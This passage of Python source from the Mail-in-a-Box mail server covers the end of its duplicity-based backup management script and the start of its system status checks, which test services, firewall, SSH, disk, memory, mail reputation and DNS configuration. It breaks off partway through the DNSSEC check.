finally: # Start services again. service_command("postgrey", "start", quit=False) service_command("dovecot", "start", quit=False) service_command("postfix", "start", quit=False) service_command("php8.0-fpm", "start", quit=False) # Remove old backups. This deletes all backup data no longer needed # from more than 3 days ago. shell('check_call', [ "/usr/bin/duplicity", "remove-older-than", "%dD" % config["min_age_in_days"], "--verbosity", "error", "--archive-dir", backup_cache_dir, "--force", *get_duplicity_additional_args(env), get_duplicity_target_url(config) ], get_duplicity_env_vars(env)) # From duplicity's manual: # "This should only be necessary after a duplicity session fails or is # aborted prematurely." # That may be unlikely here but we may as well ensure we tidy up if # that does happen - it might just have been a poorly timed reboot. shell('check_call', [ "/usr/bin/duplicity", "cleanup", "--verbosity", "error", "--archive-dir", backup_cache_dir, "--force", *get_duplicity_additional_args(env), get_duplicity_target_url(config) ], get_duplicity_env_vars(env)) # Change ownership of backups to the user-data user, so that the after-bcakup # script can access them. if get_target_type(config) == 'file': shell('check_call', ["/bin/chown", "-R", env["STORAGE_USER"], backup_dir]) # Execute a post-backup script that does the copying to a remote server. # Run as the STORAGE_USER user, not as root. 
Pass our settings in # environment variables so the script has access to STORAGE_ROOT. post_script = os.path.join(backup_root, 'after-backup') if os.path.exists(post_script): shell('check_call', ['su', env['STORAGE_USER'], '-c', post_script, config["target"]], env=env) # Our nightly cron job executes system status checks immediately after this # backup. Since it checks that dovecot and postfix are running, block for a # bit (maximum of 10 seconds each) to give each a chance to finish restarting # before the status checks might catch them down. See #381. wait_for_service(25, True, env, 10) wait_for_service(993, True, env, 10) def run_duplicity_verification(): env = load_environment() backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') config = get_backup_config(env) backup_cache_dir = os.path.join(backup_root, 'cache') shell('check_call', [ "/usr/bin/duplicity", "--verbosity", "info", "verify", "--compare-data", "--archive-dir", backup_cache_dir, "--exclude", backup_root, *get_duplicity_additional_args(env), get_duplicity_target_url(config), env["STORAGE_ROOT"], ], get_duplicity_env_vars(env)) def run_duplicity_restore(args): env = load_environment() config = get_backup_config(env) backup_cache_dir = os.path.join(env["STORAGE_ROOT"], 'backup', 'cache') shell('check_call', [ "/usr/bin/duplicity", "restore", "--archive-dir", backup_cache_dir, *get_duplicity_additional_args(env), get_duplicity_target_url(config), *args], get_duplicity_env_vars(env)) def print_duplicity_command(): import shlex env = load_environment() config = get_backup_config(env) backup_cache_dir = os.path.join(env["STORAGE_ROOT"], 'backup', 'cache') for k, v in get_duplicity_env_vars(env).items(): print(f"export {k}={shlex.quote(v)}") print("duplicity", "{command}", shlex.join([ "--archive-dir", backup_cache_dir, *get_duplicity_additional_args(env), get_duplicity_target_url(config) ])) def list_target_files(config): import urllib.parse try: target = urllib.parse.urlparse(config["target"]) except ValueError: return "invalid target" if target.scheme == "file": return [(fn, os.path.getsize(os.path.join(target.path, fn))) for fn in os.listdir(target.path)] elif target.scheme == "rsync": rsync_fn_size_re = re.compile(r'.* ([^ ]*) [^ ]* [^ ]* (.*)') rsync_target = '{host}:{path}' # Strip off any trailing port specifier because it's not valid in rsync's # DEST syntax. Explicitly set the port number for the ssh transport. user_host, *_ = target.netloc.rsplit(':', 1) try: port = target.port except ValueError: port = 22 if port is None: port = 22 target_path = target.path if not target_path.endswith('/'): target_path = target_path + '/' if target_path.startswith('/'): target_path = target_path[1:] rsync_command = [ 'rsync', '-e', f'/usr/bin/ssh -i /root/.ssh/id_rsa_miab -oStrictHostKeyChecking=no -oBatchMode=yes -p {port}', '--list-only', '-r', rsync_target.format( host=user_host, path=target_path) ] code, listing = shell('check_output', rsync_command, trap=True, capture_stderr=True) if code == 0: ret = [] for l in listing.split('\n'): match = rsync_fn_size_re.match(l) if match: ret.append( (match.groups()[1], int(match.groups()[0].replace(',',''))) ) return ret else: if 'Permission denied (publickey).' in listing: reason = "Invalid user or check you correctly copied the SSH key." elif 'No such file or directory' in listing: reason = f"Provided path {target_path} is invalid." elif 'Network is unreachable' in listing: reason = f"The IP address {target.hostname} is unreachable." 
elif 'Could not resolve hostname' in listing: reason = f"The hostname {target.hostname} cannot be resolved." else: reason = ("Unknown error." "Please check running 'management/backup.py --verify'" "from mailinabox sources to debug the issue.") msg = f"Connection to rsync host failed: {reason}" raise ValueError(msg) elif target.scheme == "s3": import boto3.s3 from botocore.exceptions import ClientError # separate bucket from path in target bucket = target.path[1:].split('/')[0] path = '/'.join(target.path[1:].split('/')[1:]) + '/' # If no prefix is specified, set the path to '', otherwise boto won't list the files if path == '/': path = '' if bucket == "": msg = "Enter an S3 bucket name." raise ValueError(msg) # connect to the region & bucket try: s3 = boto3.client('s3', \ endpoint_url=f'https://{target.hostname}', \ aws_access_key_id=config['target_user'], \ aws_secret_access_key=config['target_pass']) bucket_objects = s3.list_objects_v2(Bucket=bucket, Prefix=path)['Contents'] backup_list = [(key['Key'][len(path):], key['Size']) for key in bucket_objects] except ClientError as e: raise ValueError(e) return backup_list elif target.scheme == 'b2': from b2sdk.v1 import InMemoryAccountInfo, B2Api from b2sdk.v1.exception import NonExistentBucket info = InMemoryAccountInfo() b2_api = B2Api(info) # Extract information from target b2_application_keyid = target.netloc[:target.netloc.index(':')] b2_application_key = urllib.parse.unquote(target.netloc[target.netloc.index(':')+1:target.netloc.index('@')]) b2_bucket = target.netloc[target.netloc.index('@')+1:] try: b2_api.authorize_account("production", b2_application_keyid, b2_application_key) bucket = b2_api.get_bucket_by_name(b2_bucket) except NonExistentBucket: msg = "B2 Bucket does not exist. Please double check your information!" raise ValueError(msg) return [(key.file_name, key.size) for key, _ in bucket.ls()] else: raise ValueError(config["target"]) def backup_set_custom(env, target, target_user, target_pass, min_age): config = get_backup_config(env, for_save=True) # min_age must be an int if isinstance(min_age, str): min_age = int(min_age) config["target"] = target config["target_user"] = target_user config["target_pass"] = target_pass config["min_age_in_days"] = min_age # Validate. try: if config["target"] not in {"off", "local"}: # these aren't supported by the following function, which expects a full url in the target key, # which is what is there except when loading the config prior to saving list_target_files(config) except ValueError as e: return str(e) write_backup_config(env, config) return "OK" def get_backup_config(env, for_save=False, for_ui=False): backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') # Defaults. config = { "min_age_in_days": 3, "target": "local", } # Merge in anything written to custom.yaml. try: with open(os.path.join(backup_root, 'custom.yaml'), encoding="utf-8") as f: custom_config = rtyaml.load(f) if not isinstance(custom_config, dict): raise ValueError # caught below config.update(custom_config) except: pass # When updating config.yaml, don't do any further processing on what we find. if for_save: return config # When passing this back to the admin to show the current settings, do not include # authentication details. The user will have to re-enter it. 
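	# (Concretely, target_user and target_pass are removed just below when
	# for_ui=True.) For reference, a hypothetical custom.yaml might look like:
	#   min_age_in_days: 3
	#   target: s3://s3.eu-central-1.example.com/my-bucket/box
	#   target_user: ACCESSKEYID
	#   target_pass: secretaccesskey
	# file://, rsync://user@host/path/, and b2://keyId:applicationKey@bucket
	# targets are also accepted (see list_target_files above).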
if for_ui: for field in ("target_user", "target_pass"): if field in config: del config[field] # helper fields for the admin config["file_target_directory"] = os.path.join(backup_root, 'encrypted') config["enc_pw_file"] = os.path.join(backup_root, 'secret_key.txt') if config["target"] == "local": # Expand to the full URL. config["target"] = "file://" + config["file_target_directory"] ssh_pub_key = os.path.join('/root', '.ssh', 'id_rsa_miab.pub') if os.path.exists(ssh_pub_key): with open(ssh_pub_key, encoding="utf-8") as f: config["ssh_pub_key"] = f.read() return config def write_backup_config(env, newconfig): backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') with open(os.path.join(backup_root, 'custom.yaml'), "w", encoding="utf-8") as f: f.write(rtyaml.dump(newconfig)) if __name__ == "__main__": if sys.argv[-1] == "--verify": # Run duplicity's verification command to check a) the backup files # are readable, and b) report if they are up to date. run_duplicity_verification() elif sys.argv[-1] == "--list": # List the saved backup files. for fn, size in list_target_files(get_backup_config(load_environment())): print(f"{fn}\t{size}") elif sys.argv[-1] == "--status": # Show backup status. ret = backup_status(load_environment()) print(rtyaml.dump(ret["backups"])) print("Storage for unmatched files:", ret["unmatched_file_size"]) elif len(sys.argv) >= 2 and sys.argv[1] == "--restore": # Run duplicity restore. Rest of command line passed as arguments # to duplicity. The restore path should be specified. run_duplicity_restore(sys.argv[2:]) elif sys.argv[-1] == "--duplicity-command": print_duplicity_command() else: # Perform a backup. Add --full to force a full backup rather than # possibly performing an incremental backup. full_backup = "--full" in sys.argv perform_backup(full_backup) File: management/status_checks.py #!/usr/local/lib/mailinabox/env/bin/python # # Checks that the upstream DNS has been set correctly and that # TLS certificates have been signed, etc., and if not tells the user # what to do next. 
import sys, os, os.path, re, datetime, multiprocessing.pool import asyncio import dns.reversename, dns.resolver import idna import psutil import postfix_mta_sts_resolver.resolver from dns_update import get_dns_zones, build_tlsa_record, get_custom_dns_config, get_secondary_dns, get_custom_dns_records from web_update import get_web_domains, get_domains_with_a_records from ssl_certificates import get_ssl_certificates, get_domain_ssl_files, check_certificate from mailconfig import get_mail_domains, get_mail_aliases from utils import shell, sort_domains, load_env_vars_from_file, load_settings, get_ssh_port, get_ssh_config_value def get_services(): return [ { "name": "Local DNS (bind9)", "port": 53, "public": False, }, #{ "name": "NSD Control", "port": 8952, "public": False, }, { "name": "Local DNS Control (bind9/rndc)", "port": 953, "public": False, }, { "name": "Dovecot LMTP LDA", "port": 10026, "public": False, }, { "name": "Postgrey", "port": 10023, "public": False, }, { "name": "Spamassassin", "port": 10025, "public": False, }, { "name": "OpenDKIM", "port": 8891, "public": False, }, { "name": "OpenDMARC", "port": 8893, "public": False, }, { "name": "Mail-in-a-Box Management Daemon", "port": 10222, "public": False, }, { "name": "SSH Login (ssh)", "port": get_ssh_port(), "public": True, }, { "name": "Public DNS (nsd4)", "port": 53, "public": True, }, { "name": "Incoming Mail (SMTP/postfix)", "port": 25, "public": True, }, { "name": "Outgoing Mail (SMTP 465/postfix)", "port": 465, "public": True, }, { "name": "Outgoing Mail (SMTP 587/postfix)", "port": 587, "public": True, }, #{ "name": "Postfix/master", "port": 10587, "public": True, }, { "name": "IMAPS (dovecot)", "port": 993, "public": True, }, { "name": "Mail Filters (Sieve/dovecot)", "port": 4190, "public": True, }, { "name": "HTTP Web (nginx)", "port": 80, "public": True, }, { "name": "HTTPS Web (nginx)", "port": 443, "public": True, }, ] def run_checks(rounded_values, env, output, pool, domains_to_check=None): # run systems checks output.add_heading("System") # check that services are running if not run_services_checks(env, output, pool): # If critical services are not running, stop. If bind9 isn't running, # all later DNS checks will timeout and that will take forever to # go through, and if running over the web will cause a fastcgi timeout. return # clear bind9's DNS cache so our DNS checks are up to date # (ignore errors; if bind9/rndc isn't running we'd already report # that in run_services checks.) shell('check_call', ["/usr/sbin/rndc", "flush"], trap=True) run_system_checks(rounded_values, env, output) # perform other checks asynchronously run_network_checks(env, output) run_domain_checks(rounded_values, env, output, pool, domains_to_check=domains_to_check) def run_services_checks(env, output, pool): # Check that system services are running. all_running = True fatal = False ret = pool.starmap(check_service, ((i, service, env) for i, service in enumerate(get_services())), chunksize=1) for _i, running, fatal2, output2 in sorted(ret): if output2 is None: continue # skip check (e.g. no port was set, e.g. no sshd) all_running = all_running and running fatal = fatal or fatal2 output2.playback(output) # Check fail2ban. 
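	# A non-zero exit status from `fail2ban-client status` (e.g. because the
	# fail2ban server socket is unreachable) is treated as fail2ban not running.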
code, ret = shell('check_output', ["fail2ban-client", "status"], capture_stderr=True, trap=True) if code != 0: output.print_error("fail2ban is not running.") all_running = False if all_running: output.print_ok("All system services are running.") return not fatal def check_service(i, service, env): if not service["port"]: # Skip check (no port, e.g. no sshd). return (i, None, None, None) output = BufferedOutput() running = False fatal = False # Helper function to make a connection to the service, since we try # up to three ways (localhost, IPv4 address, IPv6 address). def try_connect(ip): # Connect to the given IP address on the service's port with a one-second timeout. import socket s = socket.socket(socket.AF_INET if ":" not in ip else socket.AF_INET6, socket.SOCK_STREAM) s.settimeout(1) try: s.connect((ip, service["port"])) return True except OSError: # timed out or some other odd error return False finally: s.close() if service["public"]: # Service should be publicly accessible. if try_connect(env["PUBLIC_IP"]): # IPv4 ok. if not env.get("PUBLIC_IPV6") or service.get("ipv6") is False or try_connect(env["PUBLIC_IPV6"]): # No IPv6, or service isn't meant to run on IPv6, or IPv6 is good. running = True # IPv4 ok but IPv6 failed. Try the PRIVATE_IPV6 address to see if the service is bound to the interface. elif service["port"] != 53 and try_connect(env["PRIVATE_IPV6"]): output.print_error("%s is running (and available over IPv4 and the local IPv6 address), but it is not publicly accessible at %s:%d." % (service['name'], env['PUBLIC_IPV6'], service['port'])) else: output.print_error("%s is running and available over IPv4 but is not accessible over IPv6 at %s port %d." % (service['name'], env['PUBLIC_IPV6'], service['port'])) # IPv4 failed. Try the private IP to see if the service is running but not accessible (except DNS because a different service runs on the private IP). elif service["port"] != 53 and try_connect("127.0.0.1"): output.print_error("%s is running but is not publicly accessible at %s:%d." % (service['name'], env['PUBLIC_IP'], service['port'])) else: output.print_error("%s is not running (port %d)." % (service['name'], service['port'])) # Why is nginx not running? if not running and service["port"] in {80, 443}: output.print_line(shell('check_output', ['nginx', '-t'], capture_stderr=True, trap=True)[1].strip()) # Service should be running locally. elif try_connect("127.0.0.1"): running = True else: output.print_error("%s is not running (port %d)." % (service['name'], service['port'])) # Flag if local DNS is not running. if not running and service["port"] == 53 and service["public"] is False: fatal = True return (i, running, fatal, output) def run_system_checks(rounded_values, env, output): check_ssh_password(env, output) check_software_updates(env, output) check_miab_version(env, output) check_system_aliases(env, output) check_free_disk_space(rounded_values, env, output) check_free_memory(rounded_values, env, output) def check_ufw(env, output): if not os.path.isfile('/usr/sbin/ufw'): output.print_warning("""The ufw program was not installed. If your system is able to run iptables, rerun the setup.""") return code, ufw = shell('check_output', ['ufw', 'status'], trap=True) if code != 0: # The command failed, it's safe to say the firewall is disabled output.print_warning("""The firewall is not working on this machine. An error was received while trying to check the firewall. 
To investigate run 'sudo ufw status'.""") return ufw = ufw.splitlines() if ufw[0] == "Status: active": not_allowed_ports = 0 for service in get_services(): if service["public"] and not is_port_allowed(ufw, service["port"]): not_allowed_ports += 1 output.print_error("Port {} ({}) should be allowed in the firewall, please re-run the setup.".format(service["port"], service["name"])) if not_allowed_ports == 0: output.print_ok("Firewall is active.") else: output.print_warning("""The firewall is disabled on this machine. This might be because the system is protected by an external firewall. We can't protect the system against bruteforce attacks without the local firewall active. Connect to the system via ssh and try to run: ufw enable.""") def is_port_allowed(ufw, port): return any(re.match(str(port) +"[/ \t].*", item) for item in ufw) def check_ssh_password(env, output): config_value = get_ssh_config_value("passwordauthentication") if config_value: if config_value == "no": output.print_ok("SSH disallows password-based login.") else: output.print_error("""The SSH server on this machine permits password-based login. A more secure way to log in is using a public key. Add your SSH public key to $HOME/.ssh/authorized_keys, check that you can log in without a password, set the option 'PasswordAuthentication no' in /etc/ssh/sshd_config, and then restart the openssh via 'sudo service ssh restart'.""") def is_reboot_needed_due_to_package_installation(): return os.path.exists("/var/run/reboot-required") def check_software_updates(env, output): # Check for any software package updates. pkgs = list_apt_updates(apt_update=False) if is_reboot_needed_due_to_package_installation(): output.print_error("System updates have been installed and a reboot of the machine is required.") elif len(pkgs) == 0: output.print_ok("System software is up to date.") else: output.print_error("There are %d software packages that can be updated." % len(pkgs)) for p in pkgs: output.print_line("{} ({})".format(p["package"], p["version"])) def check_system_aliases(env, output): # Check that the administrator alias exists since that's where all # admin email is automatically directed. check_alias_exists("System administrator address", "administrator@" + env['PRIMARY_HOSTNAME'], env, output) def check_free_disk_space(rounded_values, env, output): # Check free disk space. st = os.statvfs(env['STORAGE_ROOT']) bytes_total = st.f_blocks * st.f_frsize bytes_free = st.f_bavail * st.f_frsize disk_msg = "The disk has %.2f GB space remaining." % (bytes_free/1024.0/1024.0/1024.0) if bytes_free > .3 * bytes_total: if rounded_values: disk_msg = "The disk has more than 30% free space." output.print_ok(disk_msg) elif bytes_free > .15 * bytes_total: if rounded_values: disk_msg = "The disk has less than 30% free space." output.print_warning(disk_msg) else: if rounded_values: disk_msg = "The disk has less than 15% free space." output.print_error(disk_msg) # Check that there's only one duplicity cache. If there's more than one, # it's probably no longer in use, and we can recommend clearing the cache # to save space. The cache directory may not exist yet, which is OK. backup_cache_path = os.path.join(env['STORAGE_ROOT'], 'backup/cache') try: backup_cache_count = len(os.listdir(backup_cache_path)) except: backup_cache_count = 0 if backup_cache_count > 1: output.print_warning(f"The backup cache directory {backup_cache_path} has more than one backup target cache. 
Consider clearing this directory to save disk space.") def check_free_memory(rounded_values, env, output): # Check free memory. percent_free = 100 - psutil.virtual_memory().percent memory_msg = "System memory is %s%% free." % str(round(percent_free)) if percent_free >= 20: if rounded_values: memory_msg = "System free memory is at least 20%." output.print_ok(memory_msg) elif percent_free >= 10: if rounded_values: memory_msg = "System free memory is below 20%." output.print_warning(memory_msg) else: if rounded_values: memory_msg = "System free memory is below 10%." output.print_error(memory_msg) def run_network_checks(env, output): # Also see setup/network-checks.sh. output.add_heading("Network") check_ufw(env, output) # Stop if we cannot make an outbound connection on port 25. Many residential # networks block outbound port 25 to prevent their network from sending spam. # See if we can reach one of Google's MTAs with a 5-second timeout. _code, ret = shell("check_call", ["/bin/nc", "-z", "-w5", "aspmx.l.google.com", "25"], trap=True) if ret == 0: output.print_ok("Outbound mail (SMTP port 25) is not blocked.") else: output.print_error("""Outbound mail (SMTP port 25) seems to be blocked by your network. You will not be able to send any mail. Many residential networks block port 25 to prevent hijacked machines from being able to send spam. A quick connection test to Google's mail server on port 25 failed.""") # Stop if the IPv4 address is listed in the ZEN Spamhaus Block List. # The user might have ended up on an IP address that was previously in use # by a spammer, or the user may be deploying on a residential network. We # will not be able to reliably send mail in these cases. # See https://www.spamhaus.org/news/article/807/using-our-public-mirrors-check-your-return-codes-now. for # information on spamhaus return codes rev_ip4 = ".".join(reversed(env['PUBLIC_IP'].split('.'))) zen = query_dns(rev_ip4+'.zen.spamhaus.org', 'A', nxdomain=None) if zen is None: output.print_ok("IP address is not blacklisted by zen.spamhaus.org.") elif zen == "[timeout]": output.print_warning("Connection to zen.spamhaus.org timed out. Could not determine whether this box's IP address is blacklisted. Please try again later.") elif zen == "[Not Set]": output.print_warning("Could not connect to zen.spamhaus.org. Could not determine whether this box's IP address is blacklisted. Please try again later.") elif zen == "127.255.255.252": output.print_warning("Incorrect spamhaus query: %s. Could not determine whether this box's IP address is blacklisted." % (rev_ip4+'.zen.spamhaus.org')) elif zen == "127.255.255.254": output.print_warning("Mail-in-a-Box is configured to use a public DNS server. This is not supported by spamhaus. Could not determine whether this box's IP address is blacklisted.") elif zen == "127.255.255.255": output.print_warning("Too many queries have been performed on the spamhaus server. Could not determine whether this box's IP address is blacklisted.") else: output.print_error("""The IP address of this machine {} is listed in the Spamhaus Block List (code {}), which may prevent recipients from receiving your email. See http://www.spamhaus.org/query/ip/{}.""".format(env['PUBLIC_IP'], zen, env['PUBLIC_IP'])) def run_domain_checks(rounded_time, env, output, pool, domains_to_check=None): # Get the list of domains we handle mail for. mail_domains = get_mail_domains(env) # Get the list of domains we serve DNS zones for (i.e. does not include subdomains). 
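	# get_dns_zones returns (domain, zonefile) pairs, one per zone apex, so the dict
	# below maps each zone apex to its zone file name. Illustrative shape:
	#
	#   >>> dict(get_dns_zones(env))
	#   {'example.com': 'example.com.txt', 'example.net': 'example.net.txt'}
	#
	# (The actual file names come from safe_domain_name() and may differ.)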
dns_zonefiles = dict(get_dns_zones(env)) dns_domains = set(dns_zonefiles) # Get the list of domains we serve HTTPS for. web_domains = set(get_web_domains(env)) if domains_to_check is None: domains_to_check = mail_domains | dns_domains | web_domains # Remove "www", "autoconfig", "autodiscover", and "mta-sts" subdomains, which we group with their parent, # if their parent is in the domains to check list. domains_to_check = [ d for d in domains_to_check if not ( d.split(".", 1)[0] in {"www", "autoconfig", "autodiscover", "mta-sts"} and len(d.split(".", 1)) == 2 and d.split(".", 1)[1] in domains_to_check ) ] # Get the list of domains that we don't serve web for because of a custom CNAME/A record. domains_with_a_records = get_domains_with_a_records(env) # Serial version: #for domain in sort_domains(domains_to_check, env): # run_domain_checks_on_domain(domain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains) # Parallelize the checks across a worker pool. args = ((domain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains, domains_with_a_records) for domain in domains_to_check) ret = pool.starmap(run_domain_checks_on_domain, args, chunksize=1) ret = dict(ret) # (domain, output) => { domain: output } for domain in sort_domains(ret, env): ret[domain].playback(output) def run_domain_checks_on_domain(domain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains, domains_with_a_records): output = BufferedOutput() # When running inside Flask, the worker threads don't get a thread pool automatically. # Also this method is called in a forked worker pool, so creating a new loop is probably # a good idea. asyncio.set_event_loop(asyncio.new_event_loop()) # we'd move this up, but this returns non-pickleable values ssl_certificates = get_ssl_certificates(env) # The domain is IDNA-encoded in the database, but for display use Unicode. try: domain_display = idna.decode(domain.encode('ascii')) output.add_heading(domain_display) except (ValueError, UnicodeError, idna.IDNAError) as e: # Looks like we have some invalid data in our database. output.add_heading(domain) output.print_error("Domain name is invalid: " + str(e)) if domain == env["PRIMARY_HOSTNAME"]: check_primary_hostname_dns(domain, env, output, dns_domains, dns_zonefiles) if domain in dns_domains: check_dns_zone(domain, env, output, dns_zonefiles) if domain in mail_domains: check_mail_domain(domain, env, output) if domain in web_domains: check_web_domain(domain, rounded_time, ssl_certificates, env, output) if domain in dns_domains: check_dns_zone_suggestions(domain, env, output, dns_zonefiles, domains_with_a_records) # Check auto-configured subdomains. See run_domain_checks. # Skip mta-sts because we check the policy directly. for label in ("www", "autoconfig", "autodiscover"): subdomain = label + "." + domain if subdomain in web_domains or subdomain in mail_domains: # Run checks. subdomain_output = run_domain_checks_on_domain(subdomain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains, domains_with_a_records) # Prepend the domain name to the start of each check line, and then add to the # checks for this domain. for attr, args, kwargs in subdomain_output[1].buf: if attr == "add_heading": # Drop the heading, but use its text as the subdomain name in # each line since it is in Unicode form. 
subdomain = args[0] continue if len(args) == 1 and isinstance(args[0], str): args = [ subdomain + ": " + args[0] ] getattr(output, attr)(*args, **kwargs) return (domain, output) def check_primary_hostname_dns(domain, env, output, dns_domains, dns_zonefiles): # If a DS record is set on the zone containing this domain, check DNSSEC now. has_dnssec = False for zone in dns_domains: if (zone == domain or domain.endswith("." + zone)) and query_dns(zone, "DS", nxdomain=None) is not None: has_dnssec = True check_dnssec(zone, env, output, dns_zonefiles, is_checking_primary=True) ip = query_dns(domain, "A") ns_ips = query_dns("ns1." + domain, "A") + '/' + query_dns("ns2." + domain, "A") my_ips = env['PUBLIC_IP'] + ((" / "+env['PUBLIC_IPV6']) if env.get("PUBLIC_IPV6") else "") # Check that the ns1/ns2 hostnames resolve to A records. This information probably # comes from the TLD since the information is set at the registrar as glue records. # We're probably not actually checking that here but instead checking that we, as # the nameserver, are reporting the right info --- but if the glue is incorrect this # will probably fail. if ns_ips == env['PUBLIC_IP'] + '/' + env['PUBLIC_IP']: output.print_ok("Nameserver glue records are correct at registrar. [ns1/ns2.{} ↦ {}]".format(env['PRIMARY_HOSTNAME'], env['PUBLIC_IP'])) elif ip == env['PUBLIC_IP']: # The NS records are not what we expect, but the domain resolves correctly, so # the user may have set up external DNS. List this discrepancy as a warning. output.print_warning("""Nameserver glue records (ns1.{} and ns2.{}) should be configured at your domain name registrar as having the IP address of this box ({}). They currently report addresses of {}. If you have set up External DNS, this may be OK.""".format(env['PRIMARY_HOSTNAME'], env['PRIMARY_HOSTNAME'], env['PUBLIC_IP'], ns_ips)) else: output.print_error("""Nameserver glue records are incorrect. The ns1.{} and ns2.{} nameservers must be configured at your domain name registrar as having the IP address {}. They currently report addresses of {}. It may take several hours for public DNS to update after a change.""".format(env['PRIMARY_HOSTNAME'], env['PRIMARY_HOSTNAME'], env['PUBLIC_IP'], ns_ips)) # Check that PRIMARY_HOSTNAME resolves to PUBLIC_IP[V6] in public DNS. ipv6 = query_dns(domain, "AAAA") if env.get("PUBLIC_IPV6") else None if ip == env['PUBLIC_IP'] and not (ipv6 and env['PUBLIC_IPV6'] and ipv6 != normalize_ip(env['PUBLIC_IPV6'])): output.print_ok("Domain resolves to box's IP address. [{} ↦ {}]".format(env['PRIMARY_HOSTNAME'], my_ips)) else: output.print_error("""This domain must resolve to this box's IP address ({}) in public DNS but it currently resolves to {}. It may take several hours for public DNS to update after a change. This problem may result from other issues listed above.""".format(my_ips, ip + ((" / " + ipv6) if ipv6 is not None else ""))) # Check reverse DNS matches the PRIMARY_HOSTNAME. Note that it might not be # a DNS zone if it is a subdomain of another domain we have a zone for. existing_rdns_v4 = query_dns(dns.reversename.from_address(env['PUBLIC_IP']), "PTR") existing_rdns_v6 = query_dns(dns.reversename.from_address(env['PUBLIC_IPV6']), "PTR") if env.get("PUBLIC_IPV6") else None if existing_rdns_v4 == domain and existing_rdns_v6 in {None, domain}: output.print_ok("Reverse DNS is set correctly at ISP. 
[{} ↦ {}]".format(my_ips, env['PRIMARY_HOSTNAME'])) elif existing_rdns_v4 == existing_rdns_v6 or existing_rdns_v6 is None: output.print_error(f"""This box's reverse DNS is currently {existing_rdns_v4}, but it should be {domain}. Your ISP or cloud provider will have instructions on setting up reverse DNS for this box.""" ) else: output.print_error(f"""This box's reverse DNS is currently {existing_rdns_v4} (IPv4) and {existing_rdns_v6} (IPv6), but it should be {domain}. Your ISP or cloud provider will have instructions on setting up reverse DNS for this box.""" ) # Check the TLSA record. tlsa_qname = "_25._tcp." + domain tlsa25 = query_dns(tlsa_qname, "TLSA", nxdomain=None) tlsa25_expected = build_tlsa_record(env) if tlsa25 == tlsa25_expected: output.print_ok("""The DANE TLSA record for incoming mail is correct (%s).""" % tlsa_qname,) elif tlsa25 is None: if has_dnssec: # Omit a warning about it not being set if DNSSEC isn't enabled, # since TLSA shouldn't be used without DNSSEC. output.print_warning("""The DANE TLSA record for incoming mail is not set. This is optional.""") else: output.print_error(f"""The DANE TLSA record for incoming mail ({tlsa_qname}) is not correct. It is '{tlsa25}' but it should be '{tlsa25_expected}'. It may take several hours for public DNS to update after a change.""") # Check that the hostmaster@ email address exists. check_alias_exists("Hostmaster contact address", "hostmaster@" + domain, env, output) def check_alias_exists(alias_name, alias, env, output): mail_aliases = {address: receivers for address, receivers, *_ in get_mail_aliases(env)} if alias in mail_aliases: if mail_aliases[alias]: output.print_ok(f"{alias_name} exists as a mail alias. [{alias} ↦ {mail_aliases[alias]}]") else: output.print_error("""You must set the destination of the mail alias for %s to direct email to you or another administrator.""" % alias) else: output.print_error("""You must add a mail alias for %s which directs email to you or another administrator.""" % alias) def check_dns_zone(domain, env, output, dns_zonefiles): # If a DS record is set at the registrar, check DNSSEC first because it will affect the NS query. # If it is not set, we suggest it last. if query_dns(domain, "DS", nxdomain=None) is not None: check_dnssec(domain, env, output, dns_zonefiles) # We provide a DNS zone for the domain. It should have NS records set up # at the domain name's registrar pointing to this box. The secondary DNS # server may be customized. # (I'm not sure whether this necessarily tests the TLD's configuration, # as it should, or if one successful NS line at the TLD will result in # this query being answered by the box, which would mean the test is only # half working.) custom_dns_records = list(get_custom_dns_config(env)) # generator => list so we can reuse it correct_ip = "; ".join(sorted(get_custom_dns_records(custom_dns_records, domain, "A"))) or env['PUBLIC_IP'] custom_secondary_ns = get_secondary_dns(custom_dns_records, mode="NS") secondary_ns = custom_secondary_ns or ["ns2." + env['PRIMARY_HOSTNAME']] existing_ns = query_dns(domain, "NS") correct_ns = "; ".join(sorted(["ns1." + env["PRIMARY_HOSTNAME"], *secondary_ns])) ip = query_dns(domain, "A") probably_external_dns = False if existing_ns.lower() == correct_ns.lower(): output.print_ok("Nameservers are set correctly at registrar. [%s]" % correct_ns) elif ip == correct_ip: # The domain resolves correctly, so maybe the user is using External DNS. 
output.print_warning(f"""The nameservers set on this domain at your domain name registrar should be {correct_ns}. They are currently {existing_ns}. If you are using External DNS, this may be OK.""" ) probably_external_dns = True else: output.print_error(f"""The nameservers set on this domain are incorrect. They are currently {existing_ns}. Use your domain name registrar's control panel to set the nameservers to {correct_ns}.""" ) # Check that each custom secondary nameserver resolves the IP address. if custom_secondary_ns and not probably_external_dns: for ns in custom_secondary_ns: # We must first resolve the nameserver to an IP address so we can query it. ns_ips = query_dns(ns, "A") if not ns_ips or ns_ips in {'[Not Set]', '[timeout]'}: output.print_error("Secondary nameserver %s is not valid (it doesn't resolve to an IP address)." % ns) continue # Choose the first IP if nameserver returns multiple ns_ip = ns_ips.split('; ')[0] # Now query it to see what it says about this domain. ip = query_dns(domain, "A", at=ns_ip, nxdomain=None) if ip == correct_ip: output.print_ok("Secondary nameserver %s resolved the domain correctly." % ns) elif ip is None: output.print_error("Secondary nameserver %s is not configured to resolve this domain." % ns) else: output.print_error(f"Secondary nameserver {ns} is not configured correctly. (It resolved this domain as {ip}. It should be {correct_ip}.)") def check_dns_zone_suggestions(domain, env, output, dns_zonefiles, domains_with_a_records): # Warn if a custom DNS record is preventing this or the automatic www redirect from # being served. if domain in domains_with_a_records: output.print_warning("""Web has been disabled for this domain because you have set a custom DNS record.""") if "www." + domain in domains_with_a_records: output.print_warning("""A redirect from 'www.%s' has been disabled for this domain because you have set a custom DNS record on the www subdomain.""" % domain) # Since DNSSEC is optional, if a DS record is NOT set at the registrar suggest it. # (If it was set, we did the check earlier.) if query_dns(domain, "DS", nxdomain=None) is None: check_dnssec(domain, env, output, dns_zonefiles) def check_dnssec(domain, env, output, dns_zonefiles, is_checking_primary=False): # See if the domain has a DS record set at the registrar. The DS record must # match one of the keys that we've used to sign the zone. It may use one of # several hashing algorithms. We've pre-generated all possible valid DS # records, although some will be preferred. alg_name_map = { '7': 'RSASHA1-NSEC3-SHA1', '8': 'RSASHA256', '13': 'ECDSAP256SHA256' } 